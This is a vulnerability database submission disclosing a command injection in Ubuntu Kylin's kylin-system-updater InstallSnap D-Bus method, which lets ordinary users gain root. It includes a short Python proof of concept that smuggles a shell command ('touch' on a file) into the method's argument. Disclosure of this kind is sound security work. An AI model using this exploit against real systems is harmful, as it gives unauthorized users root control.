| Título | UbuntuKylin OS privilege escalation vulnerability |
|---|
| Descrição | Describe
There is a command injection vulnerability in the InstallSnap function in the update component (Kylin-system-updater) of the Ubuntu Kylin OS system. Any user can call the vulnerability, causing ordinary users to obtain root privileges through the vulnerability.
Hazard level
High
Affected version
Ubuntukylin:kylin-system-updater <= 1.4.20kord
POC&&EXP
ISO Download:
https://www.ubuntukylin.com/downloads/download.php?id=91
exp.py
```
import dbus
import os
payload = ';touch /InstallSnap.txt;'
bus=dbus.SystemBus()
xattr=bus.get_object('com.kylin.systemupgrade','/com/kylin/systemupgrade')
iface=dbus.Interface(xattr,dbus_interface='com.kylin.systemupgrade.interface')
prop=iface.InstallSnap("{}".format(payload))
print(prop)
os.system("ls -l /InstallSnap.txt")
``` |
|---|
| Fonte | ⚠️ https://github.com/cn-lwj/vuldb/blob/master/kylin-system-updater_vuln.md |
|---|
| Utilizador | cn-lwj (UID 42196) |
|---|
| Submissão | 03/03/2023 10h53 (há 3 anos) |
|---|
| Moderação | 08/03/2023 19h06 (5 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 222600 [kylin-system-updater até 1.4.20kord em Ubuntu Kylin Update InstallSnap Elevação de Privilégios] |
|---|
| Pontos | 20 |
|---|